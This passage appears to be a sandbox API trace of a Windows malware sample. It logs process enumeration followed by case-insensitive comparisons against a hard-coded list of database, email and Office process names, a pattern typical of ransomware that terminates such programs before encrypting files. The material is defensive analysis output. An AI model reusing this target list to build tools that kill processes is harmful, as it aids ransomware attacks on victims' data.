th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.941] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0105.942] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0106.058] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0106.059] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.060] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0106.061] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0106.062] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="expense.exe")) returned 1 [0106.063] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="restructuring.exe")) returned 1 [0106.063] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x730, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="seem.exe")) returned 1 [0106.064] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="und-rica.exe")) returned 1 [0106.065] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x60c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fighters.exe")) returned 1 [0106.066] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x20c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="dimensions flyer.exe")) returned 1 [0106.067] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="des.exe")) returned 1 [0106.068] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="casting.exe")) returned 1 [0106.069] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="morrison-consult.exe")) returned 1 [0106.070] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x48c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="targeted.exe")) returned 1 [0106.071] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="modify_vital_consider.exe")) returned 1 [0106.072] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x410, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="omega hiv.exe")) returned 1 [0106.072] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="strike_grid_ringtones.exe")) returned 1 [0106.073] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="reload.exe")) returned 1 [0106.074] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="inner_atomic.exe")) returned 1 [0106.075] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="box_toyota.exe")) returned 1 [0106.076] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="invited-pty-currencies.exe")) returned 1 [0106.077] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0106.078] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0106.079] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x620, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0106.080] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0106.081] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x31c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0106.082] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0106.083] lstrcmpiW (lpString1="coreftp.exe", lpString2="SearchIndexer.exesqlservr.exe") returned -1 [0106.083] lstrcmpiW (lpString1="coreftp.exe", lpString2="msftesql.exe") returned -1 [0106.083] lstrcmpiW (lpString1="coreftp.exe", lpString2="sqlagent.exe") returned -1 [0106.083] lstrcmpiW (lpString1="coreftp.exe", lpString2="sqlwriter.exe") returned -1 [0106.083] lstrcmpiW (lpString1="coreftp.exe", lpString2="oracle.exe") returned -1 [0106.083] lstrcmpiW (lpString1="coreftp.exe", lpString2="ocssd.exe") returned -1 [0106.084] lstrcmpiW (lpString1="coreftp.exe", lpString2="dbsnmp.exe") returned -1 [0106.084] lstrcmpiW (lpString1="coreftp.exe", lpString2="synctime.exe") returned -1 [0106.084] lstrcmpiW (lpString1="coreftp.exe", lpString2="mydesktopqos.exe") returned -1 [0106.084] lstrcmpiW (lpString1="coreftp.exe", lpString2="agntsvc.exe") returned 1 [0106.084] lstrcmpiW (lpString1="coreftp.exe", lpString2="isqlpplussvc.exe") returned -1 [0106.084] lstrcmpiW (lpString1="coreftp.exe", lpString2="isqlpussvc.exe") returned -1 [0106.084] lstrcmpiW (lpString1="coreftp.exe", lpString2="xfssvccon.exe") returned -1 [0106.084] lstrcmpiW (lpString1="coreftp.exe", lpString2="mydesktopservice.exe") returned -1 [0106.084] lstrcmpiW (lpString1="coreftp.exe", lpString2="ocautoupds.exe") returned -1 [0106.084] lstrcmpiW (lpString1="coreftp.exe", lpString2="encsvc.exe") returned -1 [0106.084] lstrcmpiW (lpString1="coreftp.exe", lpString2="firefoxconfig.exe") returned -1 [0106.084] lstrcmpiW (lpString1="coreftp.exe", lpString2="tbirdconfig.exe") returned -1 [0106.084] lstrcmpiW (lpString1="coreftp.exe", lpString2="ocomm.exe") returned -1 [0106.084] lstrcmpiW (lpString1="coreftp.exe", lpString2="mysqld.exe") returned -1 [0106.084] lstrcmpiW (lpString1="coreftp.exe", lpString2="mysqld-nt") returned -1 [0106.084] lstrcmpiW (lpString1="coreftp.exe", lpString2="mysqld-opt") returned -1 [0106.084] lstrcmpiW (lpString1="coreftp.exe", lpString2="dbeng50.exe") returned -1 [0106.084] lstrcmpiW (lpString1="coreftp.exe", lpString2="sqbcoreservice.exe") returned -1 [0106.084] lstrcmpiW (lpString1="coreftp.exe", lpString2="excel.exe") returned -1 [0106.085] lstrcmpiW (lpString1="coreftp.exe", lpString2="infopath.exe") returned -1 [0106.085] lstrcmpiW (lpString1="coreftp.exe", lpString2="msaccess.exe") returned -1 [0106.085] lstrcmpiW (lpString1="coreftp.exe", lpString2="mspub.exe") returned -1 [0106.085] lstrcmpiW (lpString1="coreftp.exe", lpString2="onenote.exe") returned -1 [0106.085] lstrcmpiW (lpString1="coreftp.exe", lpString2="outlook.exe") returned -1 [0106.085] lstrcmpiW (lpString1="coreftp.exe", lpString2="powerpnt.exe") returned -1 [0106.085] lstrcmpiW (lpString1="coreftp.exe", lpString2="stream.exe") returned -1 [0106.085] lstrcmpiW (lpString1="coreftp.exe", lpString2="thebat.exe") returned -1 [0106.085] lstrcmpiW (lpString1="coreftp.exe", lpString2="thebat64.exe") returned -1 [0106.085] lstrcmpiW (lpString1="coreftp.exe", lpString2="Thunderbird.exe") returned -1 [0106.085] lstrcmpiW (lpString1="coreftp.exe", lpString2="visio.exe") returned -1 [0106.085] lstrcmpiW (lpString1="coreftp.exe", lpString2="winword.exe") returned -1 [0106.085] lstrcmpiW (lpString1="coreftp.exe", lpString2="wordpad.exe") returned -1 [0106.085] lstrcmpiW (lpString1="coreftp.exe", lpString2="sqlwb.exe") returned -1 [0106.085] lstrcmpiW (lpString1="coreftp.exe", lpString2="sqlbrowser.exe") returned -1 [0106.085] lstrcmpiW (lpString1="coreftp.exe", lpString2="agntsvcagntsvc.exe") returned 1 [0106.085] lstrcmpiW (lpString1="coreftp.exe", lpString2="agntsvcencsvc.exe") returned 1 [0106.085] lstrcmpiW (lpString1="coreftp.exe", lpString2="agntsvcisqlplussvc.exe") returned 1 [0106.085] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0106.086] lstrcmpiW (lpString1="far.exe", lpString2="SearchIndexer.exesqlservr.exe") returned -1 [0106.087] lstrcmpiW (lpString1="far.exe", lpString2="msftesql.exe") returned -1 [0106.087] lstrcmpiW (lpString1="far.exe", lpString2="sqlagent.exe") returned -1 [0106.087] lstrcmpiW (lpString1="far.exe", lpString2="sqlwriter.exe") returned -1 [0106.087] lstrcmpiW (lpString1="far.exe", lpString2="oracle.exe") returned -1 [0106.087] lstrcmpiW (lpString1="far.exe", lpString2="ocssd.exe") returned -1 [0106.087] lstrcmpiW (lpString1="far.exe", lpString2="dbsnmp.exe") returned 1 [0106.087] lstrcmpiW (lpString1="far.exe", lpString2="synctime.exe") returned -1 [0106.087] lstrcmpiW (lpString1="far.exe", lpString2="mydesktopqos.exe") returned -1 [0106.087] lstrcmpiW (lpString1="far.exe", lpString2="agntsvc.exe") returned 1 [0106.087] lstrcmpiW (lpString1="far.exe", lpString2="isqlpplussvc.exe") returned -1 [0106.087] lstrcmpiW (lpString1="far.exe", lpString2="isqlpussvc.exe") returned -1 [0106.087] lstrcmpiW (lpString1="far.exe", lpString2="xfssvccon.exe") returned -1 [0106.087] lstrcmpiW (lpString1="far.exe", lpString2="mydesktopservice.exe") returned -1 [0106.087] lstrcmpiW (lpString1="far.exe", lpString2="ocautoupds.exe") returned -1 [0106.087] lstrcmpiW (lpString1="far.exe", lpString2="encsvc.exe") returned 1 [0106.087] lstrcmpiW (lpString1="far.exe", lpString2="firefoxconfig.exe") returned -1 [0106.087] lstrcmpiW (lpString1="far.exe", lpString2="tbirdconfig.exe") returned -1 [0106.087] lstrcmpiW (lpString1="far.exe", lpString2="ocomm.exe") returned -1 [0106.087] lstrcmpiW (lpString1="far.exe", lpString2="mysqld.exe") returned -1 [0106.087] lstrcmpiW (lpString1="far.exe", lpString2="mysqld-nt") returned -1 [0106.088] lstrcmpiW (lpString1="far.exe", lpString2="mysqld-opt") returned -1 [0106.088] lstrcmpiW (lpString1="far.exe", lpString2="dbeng50.exe") returned 1 [0106.088] lstrcmpiW (lpString1="far.exe", lpString2="sqbcoreservice.exe") returned -1 [0106.088] lstrcmpiW (lpString1="far.exe", lpString2="excel.exe") returned 1 [0106.088] lstrcmpiW (lpString1="far.exe", lpString2="infopath.exe") returned -1 [0106.088] lstrcmpiW (lpString1="far.exe", lpString2="msaccess.exe") returned -1 [0106.088] lstrcmpiW (lpString1="far.exe", lpString2="mspub.exe") returned -1 [0106.088] lstrcmpiW (lpString1="far.exe", lpString2="onenote.exe") returned -1 [0106.088] lstrcmpiW (lpString1="far.exe", lpString2="outlook.exe") returned -1 [0106.088] lstrcmpiW (lpString1="far.exe", lpString2="powerpnt.exe") returned -1 [0106.088] lstrcmpiW (lpString1="far.exe", lpString2="stream.exe") returned -1 [0106.088] lstrcmpiW (lpString1="far.exe", lpString2="thebat.exe") returned -1 [0106.088] lstrcmpiW (lpString1="far.exe", lpString2="thebat64.exe") returned -1 [0106.088] lstrcmpiW (lpString1="far.exe", lpString2="Thunderbird.exe") returned -1 [0106.088] lstrcmpiW (lpString1="far.exe", lpString2="visio.exe") returned -1 [0106.088] lstrcmpiW (lpString1="far.exe", lpString2="winword.exe") returned -1 [0106.088] lstrcmpiW (lpString1="far.exe", lpString2="wordpad.exe") returned -1 [0106.088] lstrcmpiW (lpString1="far.exe", lpString2="sqlwb.exe") returned -1 [0106.088] lstrcmpiW (lpString1="far.exe", lpString2="sqlbrowser.exe") returned -1 [0106.089] lstrcmpiW (lpString1="far.exe", lpString2="agntsvcagntsvc.exe") returned 1 [0106.089] lstrcmpiW (lpString1="far.exe", lpString2="agntsvcencsvc.exe") returned 1 [0106.089] lstrcmpiW (lpString1="far.exe", lpString2="agntsvcisqlplussvc.exe") returned 1 [0106.089] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0106.090] lstrcmpiW (lpString1="filezilla.exe", lpString2="SearchIndexer.exesqlservr.exe") returned -1 [0106.090] lstrcmpiW (lpString1="filezilla.exe", lpString2="msftesql.exe") returned -1 [0106.090] lstrcmpiW (lpString1="filezilla.exe", lpString2="sqlagent.exe") returned -1 [0106.090] lstrcmpiW (lpString1="filezilla.exe", lpString2="sqlwriter.exe") returned -1 [0106.090] lstrcmpiW (lpString1="filezilla.exe", lpString2="oracle.exe") returned -1 [0106.090] lstrcmpiW (lpString1="filezilla.exe", lpString2="ocssd.exe") returned -1 [0106.090] lstrcmpiW (lpString1="filezilla.exe", lpString2="dbsnmp.exe") returned 1 [0106.090] lstrcmpiW (lpString1="filezilla.exe", lpString2="synctime.exe") returned -1 [0106.090] lstrcmpiW (lpString1="filezilla.exe", lpString2="mydesktopqos.exe") returned -1 [0106.090] lstrcmpiW (lpString1="filezilla.exe", lpString2="agntsvc.exe") returned 1 [0106.090] lstrcmpiW (lpString1="filezilla.exe", lpString2="isqlpplussvc.exe") returned -1 [0106.090] lstrcmpiW (lpString1="filezilla.exe", lpString2="isqlpussvc.exe") returned -1 [0106.090] lstrcmpiW (lpString1="filezilla.exe", lpString2="xfssvccon.exe") returned -1 [0106.090] lstrcmpiW (lpString1="filezilla.exe", lpString2="mydesktopservice.exe") returned -1 [0106.090] lstrcmpiW (lpString1="filezilla.exe", lpString2="ocautoupds.exe") returned -1 [0106.090] lstrcmpiW (lpString1="filezilla.exe", lpString2="encsvc.exe") returned 1 [0106.090] lstrcmpiW (lpString1="filezilla.exe", lpString2="firefoxconfig.exe") returned -1 [0106.090] lstrcmpiW (lpString1="filezilla.exe", lpString2="tbirdconfig.exe") returned -1 [0106.090] lstrcmpiW (lpString1="filezilla.exe", lpString2="ocomm.exe") returned -1 [0106.090] lstrcmpiW (lpString1="filezilla.exe", lpString2="mysqld.exe") returned -1 [0106.091] lstrcmpiW (lpString1="filezilla.exe", lpString2="mysqld-nt") returned -1 [0106.091] lstrcmpiW (lpString1="filezilla.exe", lpString2="mysqld-opt") returned -1 [0106.091] lstrcmpiW (lpString1="filezilla.exe", lpString2="dbeng50.exe") returned 1 [0106.091] lstrcmpiW (lpString1="filezilla.exe", lpString2="sqbcoreservice.exe") returned -1 [0106.091] lstrcmpiW (lpString1="filezilla.exe", lpString2="excel.exe") returned 1 [0106.091] lstrcmpiW (lpString1="filezilla.exe", lpString2="infopath.exe") returned -1 [0106.091] lstrcmpiW (lpString1="filezilla.exe", lpString2="msaccess.exe") returned -1 [0106.091] lstrcmpiW (lpString1="filezilla.exe", lpString2="mspub.exe") returned -1 [0106.091] lstrcmpiW (lpString1="filezilla.exe", lpString2="onenote.exe") returned -1 [0106.091] lstrcmpiW (lpString1="filezilla.exe", lpString2="outlook.exe") returned -1 [0106.091] lstrcmpiW (lpString1="filezilla.exe", lpString2="powerpnt.exe") returned -1 [0106.091] lstrcmpiW (lpString1="filezilla.exe", lpString2="stream.exe") returned -1 [0106.091] lstrcmpiW (lpString1="filezilla.exe", lpString2="thebat.exe") returned -1 [0106.091] lstrcmpiW (lpString1="filezilla.exe", lpString2="thebat64.exe") returned -1 [0106.091] lstrcmpiW (lpString1="filezilla.exe", lpString2="Thunderbird.exe") returned -1 [0106.091] lstrcmpiW (lpString1="filezilla.exe", lpString2="visio.exe") returned -1 [0106.091] lstrcmpiW (lpString1="filezilla.exe", lpString2="winword.exe") returned -1 [0106.091] lstrcmpiW (lpString1="filezilla.exe", lpString2="wordpad.exe") returned -1 [0106.091] lstrcmpiW (lpString1="filezilla.exe", lpString2="sqlwb.exe") returned -1 [0106.091] lstrcmpiW (lpString1="filezilla.exe", lpString2="sqlbrowser.exe") returned -1 [0106.091] lstrcmpiW (lpString1="filezilla.exe", lpString2="agntsvcagntsvc.exe") returned 1 [0106.092] lstrcmpiW (lpString1="filezilla.exe", lpString2="agntsvcencsvc.exe") returned 1 [0106.092] lstrcmpiW (lpString1="filezilla.exe", lpString2="agntsvcisqlplussvc.exe") returned 1 [0106.092] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0106.093] lstrcmpiW (lpString1="flashfxp.exe", lpString2="SearchIndexer.exesqlservr.exe") returned -1 [0106.093] lstrcmpiW (lpString1="flashfxp.exe", lpString2="msftesql.exe") returned -1 [0106.093] lstrcmpiW (lpString1="flashfxp.exe", lpString2="sqlagent.exe") returned -1 [0106.093] lstrcmpiW (lpString1="flashfxp.exe", lpString2="sqlwriter.exe") returned -1 [0106.093] lstrcmpiW (lpString1="flashfxp.exe", lpString2="oracle.exe") returned -1 [0106.093] lstrcmpiW (lpString1="flashfxp.exe", lpString2="ocssd.exe") returned -1 [0106.093] lstrcmpiW (lpString1="flashfxp.exe", lpString2="dbsnmp.exe") returned 1 [0106.093] lstrcmpiW (lpString1="flashfxp.exe", lpString2="synctime.exe") returned -1 [0106.093] lstrcmpiW (lpString1="flashfxp.exe", lpString2="mydesktopqos.exe") returned -1 [0106.093] lstrcmpiW (lpString1="flashfxp.exe", lpString2="agntsvc.exe") returned 1 [0106.093] lstrcmpiW (lpString1="flashfxp.exe", lpString2="isqlpplussvc.exe") returned -1 [0106.093] lstrcmpiW (lpString1="flashfxp.exe", lpString2="isqlpussvc.exe") returned -1 [0106.093] lstrcmpiW (lpString1="flashfxp.exe", lpString2="xfssvccon.exe") returned -1 [0106.093] lstrcmpiW (lpString1="flashfxp.exe", lpString2="mydesktopservice.exe") returned -1 [0106.093] lstrcmpiW (lpString1="flashfxp.exe", lpString2="ocautoupds.exe") returned -1 [0106.093] lstrcmpiW (lpString1="flashfxp.exe", lpString2="encsvc.exe") returned 1 [0106.094] lstrcmpiW (lpString1="flashfxp.exe", lpString2="firefoxconfig.exe") returned 1 [0106.094] lstrcmpiW (lpString1="flashfxp.exe", lpString2="tbirdconfig.exe") returned -1 [0106.094] lstrcmpiW (lpString1="flashfxp.exe", lpString2="ocomm.exe") returned -1 [0106.094] lstrcmpiW (lpString1="flashfxp.exe", lpString2="mysqld.exe") returned -1 [0106.094] lstrcmpiW (lpString1="flashfxp.exe", lpString2="mysqld-nt") returned -1 [0106.094] lstrcmpiW (lpString1="flashfxp.exe", lpString2="mysqld-opt") returned -1 [0106.094] lstrcmpiW (lpString1="flashfxp.exe", lpString2="dbeng50.exe") returned 1 [0106.094] lstrcmpiW (lpString1="flashfxp.exe", lpString2="sqbcoreservice.exe") returned -1 [0106.094] lstrcmpiW (lpString1="flashfxp.exe", lpString2="excel.exe") returned 1 [0106.094] lstrcmpiW (lpString1="flashfxp.exe", lpString2="infopath.exe") returned -1 [0106.094] lstrcmpiW (lpString1="flashfxp.exe", lpString2="msaccess.exe") returned -1 [0106.094] lstrcmpiW (lpString1="flashfxp.exe", lpString2="mspub.exe") returned -1 [0106.094] lstrcmpiW (lpString1="flashfxp.exe", lpString2="onenote.exe") returned -1 [0106.094] lstrcmpiW (lpString1="flashfxp.exe", lpString2="outlook.exe") returned -1 [0106.094] lstrcmpiW (lpString1="flashfxp.exe", lpString2="powerpnt.exe") returned -1 [0106.094] lstrcmpiW (lpString1="flashfxp.exe", lpString2="stream.exe") returned -1 [0106.094] lstrcmpiW (lpString1="flashfxp.exe", lpString2="thebat.exe") returned -1 [0106.094] lstrcmpiW (lpString1="flashfxp.exe", lpString2="thebat64.exe") returned -1 [0106.094] lstrcmpiW (lpString1="flashfxp.exe", lpString2="Thunderbird.exe") returned -1 [0106.094] lstrcmpiW (lpString1="flashfxp.exe", lpString2="visio.exe") returned -1 [0106.095] lstrcmpiW (lpString1="flashfxp.exe", lpString2="winword.exe") returned -1 [0106.095] lstrcmpiW (lpString1="flashfxp.exe", lpString2="wordpad.exe") returned -1 [0106.095] lstrcmpiW (lpString1="flashfxp.exe", lpString2="sqlwb.exe") returned -1 [0106.095] lstrcmpiW (lpString1="flashfxp.exe", lpString2="sqlbrowser.exe") returned -1 [0106.095] lstrcmpiW (lpString1="flashfxp.exe", lpString2="agntsvcagntsvc.exe") returned 1 [0106.095] lstrcmpiW (lpString1="flashfxp.exe", lpString2="agntsvcencsvc.exe") returned 1 [0106.095] lstrcmpiW (lpString1="flashfxp.exe", lpString2="agntsvcisqlplussvc.exe") returned 1 [0106.095] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0106.096] lstrcmpiW (lpString1="fling.exe", lpString2="SearchIndexer.exesqlservr.exe") returned -1 [0106.096] lstrcmpiW (lpString1="fling.exe", lpString2="msftesql.exe") returned -1 [0106.096] lstrcmpiW (lpString1="fling.exe", lpString2="sqlagent.exe") returned -1 [0106.096] lstrcmpiW (lpString1="fling.exe", lpString2="sqlwriter.exe") returned -1 [0106.096] lstrcmpiW (lpString1="fling.exe", lpString2="oracle.exe") returned -1 [0106.096] lstrcmpiW (lpString1="fling.exe", lpString2="ocssd.exe") returned -1 [0106.096] lstrcmpiW (lpString1="fling.exe", lpString2="dbsnmp.exe") returned 1 [0106.096] lstrcmpiW (lpString1="fling.exe", lpString2="synctime.exe") returned -1 [0106.096] lstrcmpiW (lpString1="fling.exe", lpString2="mydesktopqos.exe") returned -1 [0106.096] lstrcmpiW (lpString1="fling.exe", lpString2="agntsvc.exe") returned 1 [0106.096] lstrcmpiW (lpString1="fling.exe", lpString2="isqlpplussvc.exe") returned -1 [0106.096] lstrcmpiW (lpString1="fling.exe", lpString2="isqlpussvc.exe") returned -1 [0106.096] lstrcmpiW (lpString1="fling.exe", lpString2="xfssvccon.exe") returned -1 [0106.096] lstrcmpiW (lpString1="fling.exe", lpString2="mydesktopservice.exe") returned -1 [0106.097] lstrcmpiW (lpString1="fling.exe", lpString2="ocautoupds.exe") returned -1 [0106.097] lstrcmpiW (lpString1="fling.exe", lpString2="encsvc.exe") returned 1 [0106.097] lstrcmpiW (lpString1="fling.exe", lpString2="firefoxconfig.exe") returned 1 [0106.097] lstrcmpiW (lpString1="fling.exe", lpString2="tbirdconfig.exe") returned -1 [0106.097] lstrcmpiW (lpString1="fling.exe", lpString2="ocomm.exe") returned -1 [0106.097] lstrcmpiW (lpString1="fling.exe", lpString2="mysqld.exe") returned -1 [0106.097] lstrcmpiW (lpString1="fling.exe", lpString2="mysqld-nt") returned -1 